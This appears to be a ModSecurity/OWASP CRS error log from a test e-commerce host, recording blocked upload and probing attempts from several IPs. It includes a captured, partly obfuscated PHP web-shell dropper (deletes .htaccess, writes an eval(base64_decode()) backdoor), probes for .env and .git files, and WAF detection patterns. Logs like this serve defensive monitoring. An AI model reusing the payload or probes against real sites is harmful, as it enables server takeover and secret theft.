[Sat Mar 07 14:42:06.622235 2026] [:error] [pid 2530090] [client 89.250.174.71:15069] [client 89.250.174.71] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/u/fu88364f428d25.php8"] [unique_id "aawrLqZMpHjtpPWB_zsfOAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 09 04:39:54.369216 2026] [:error] [pid 2576040] [client 101.99.88.90:56774] [client 101.99.88.90] ModSecurity: Warning. Matched phrase ".htaccess" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "601"] [id "932180"] [msg "Restricted File Upload Attempt"] [data "Matched Data: .htaccess found within FILES:file: .htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aa5BCpCqrv9G4eDnsJNf6AAAABg"]
[Mon Mar 09 04:39:54.371206 2026] [:error] [pid 2576040] [client 101.99.88.90:56774] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aa5BCpCqrv9G4eDnsJNf6AAAABg"]
[Mon Mar 09 04:39:54.371362 2026] [:error] [pid 2576040] [client 101.99.88.90:56774] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aa5BCpCqrv9G4eDnsJNf6AAAABg"]
[Mon Mar 09 04:39:54.611262 2026] [:error] [pid 2576040] [client 101.99.88.90:56774] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: inputs.php found within FILES:file: inputs.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aa5BCpCqrv9G4eDnsJNf6QAAABg"]
[Mon Mar 09 04:39:54.611399 2026] [:error] [pid 2576040] [client 101.99.88.90:56774] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aa5BCpCqrv9G4eDnsJNf6QAAABg"]
[Mon Mar 09 04:39:54.611536 2026] [:error] [pid 2576040] [client 101.99.88.90:56774] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aa5BCpCqrv9G4eDnsJNf6QAAABg"]
[Mon Mar 09 04:40:05.586194 2026] [:error] [pid 2576073] [client 101.99.88.90:53570] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: inputs.php found within FILES:file: inputs.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aa5BFU9zEb57jP43MbDz7QAAAAQ"]
[Mon Mar 09 04:40:05.586370 2026] [:error] [pid 2576073] [client 101.99.88.90:53570] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aa5BFU9zEb57jP43MbDz7QAAAAQ"]
[Mon Mar 09 04:40:05.586505 2026] [:error] [pid 2576073] [client 101.99.88.90:53570] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aa5BFU9zEb57jP43MbDz7QAAAAQ"]
[Mon Mar 09 14:28:15.168486 2026] [:error] [pid 2576094] [client 89.250.174.71:23183] [client 89.250.174.71] ModSecurity: Rule 7f9a2f5eebe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/s/ns88364f428d25.phar"] [unique_id "aa7K7xZiRpUTx5S0yzxT9AAAABE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 09 14:28:15.168849 2026] [:error] [pid 2576094] [client 89.250.174.71:23183] [client 89.250.174.71] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/s/ns88364f428d25.phar"] [unique_id "aa7K7xZiRpUTx5S0yzxT9AAAABE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 09 14:28:15.170297 2026] [:error] [pid 2576094] [client 89.250.174.71:23183] [client 89.250.174.71] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/s/ns88364f428d25.phar"] [unique_id "aa7K7xZiRpUTx5S0yzxT9AAAABE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 09 14:28:15.170478 2026] [:error] [pid 2576094] [client 89.250.174.71:23183] [client 89.250.174.71] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/s/ns88364f428d25.phar"] [unique_id "aa7K7xZiRpUTx5S0yzxT9AAAABE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 09 14:28:19.584708 2026] [:error] [pid 2576094] [client 89.250.174.71:23183] [client 89.250.174.71] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: ns88364f428d25.php8 found within FILES:custom_attributes[country_id]: ns88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aa7K8xZiRpUTx5S0yzxT9QAAABE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/n/s/ns88364f428d25.phar
[Mon Mar 09 14:28:19.585223 2026] [:error] [pid 2576094] [client 89.250.174.71:23183] [client 89.250.174.71] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aa7K8xZiRpUTx5S0yzxT9QAAABE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/n/s/ns88364f428d25.phar
[Mon Mar 09 14:28:19.585393 2026] [:error] [pid 2576094] [client 89.250.174.71:23183] [client 89.250.174.71] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aa7K8xZiRpUTx5S0yzxT9QAAABE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/n/s/ns88364f428d25.phar
[Mon Mar 09 14:28:19.981528 2026] [:error] [pid 2576094] [client 89.250.174.71:23183] [client 89.250.174.71] ModSecurity: Rule 7f9a2f5eebe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/s/ns88364f428d25.php8"] [unique_id "aa7K8xZiRpUTx5S0yzxT9gAAABE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 09 14:28:19.981902 2026] [:error] [pid 2576094] [client 89.250.174.71:23183] [client 89.250.174.71] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/s/ns88364f428d25.php8"] [unique_id "aa7K8xZiRpUTx5S0yzxT9gAAABE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 09 14:28:19.983577 2026] [:error] [pid 2576094] [client 89.250.174.71:23183] [client 89.250.174.71] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/s/ns88364f428d25.php8"] [unique_id "aa7K8xZiRpUTx5S0yzxT9gAAABE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 09 14:28:19.983745 2026] [:error] [pid 2576094] [client 89.250.174.71:23183] [client 89.250.174.71] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/s/ns88364f428d25.php8"] [unique_id "aa7K8xZiRpUTx5S0yzxT9gAAABE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Mar 10 09:16:23.792217 2026] [:error] [pid 2596887] [client 185.93.89.110:46394] [client 185.93.89.110] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aa_TV9kUTP9BSDKvzplvTgAAAAc"], referer: http://autumnus.test.indacotrentino.com//.git/HEAD
[Tue Mar 10 09:16:23.792415 2026] [:error] [pid 2596887] [client 185.93.89.110:46394] [client 185.93.89.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aa_TV9kUTP9BSDKvzplvTgAAAAc"], referer: http://autumnus.test.indacotrentino.com//.git/HEAD
[Tue Mar 10 09:16:23.792544 2026] [:error] [pid 2596887] [client 185.93.89.110:46394] [client 185.93.89.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aa_TV9kUTP9BSDKvzplvTgAAAAc"], referer: http://autumnus.test.indacotrentino.com//.git/HEAD
[Tue Mar 10 21:32:01.259941 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "abB_weuxcVHUxuYGKFewrgAAAAM"]
[Tue Mar 10 21:32:01.260137 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "abB_weuxcVHUxuYGKFewrgAAAAM"]
[Tue Mar 10 21:32:01.260258 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "abB_weuxcVHUxuYGKFewrgAAAAM"]
[Tue Mar 10 21:32:01.284866 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "abB_weuxcVHUxuYGKFewrwAAAAM"]
[Tue Mar 10 21:32:01.285029 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "abB_weuxcVHUxuYGKFewrwAAAAM"]
[Tue Mar 10 21:32:01.285144 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "abB_weuxcVHUxuYGKFewrwAAAAM"]
[Tue Mar 10 21:32:01.308238 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "abB_weuxcVHUxuYGKFewsAAAAAM"]
[Tue Mar 10 21:32:01.308343 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "abB_weuxcVHUxuYGKFewsAAAAAM"]
[Tue Mar 10 21:32:01.308494 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "abB_weuxcVHUxuYGKFewsAAAAAM"]
[Tue Mar 10 21:32:01.308623 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "abB_weuxcVHUxuYGKFewsAAAAAM"]
[Tue Mar 10 21:32:01.330199 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abB_weuxcVHUxuYGKFewsQAAAAM"]
[Tue Mar 10 21:32:01.330380 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abB_weuxcVHUxuYGKFewsQAAAAM"]
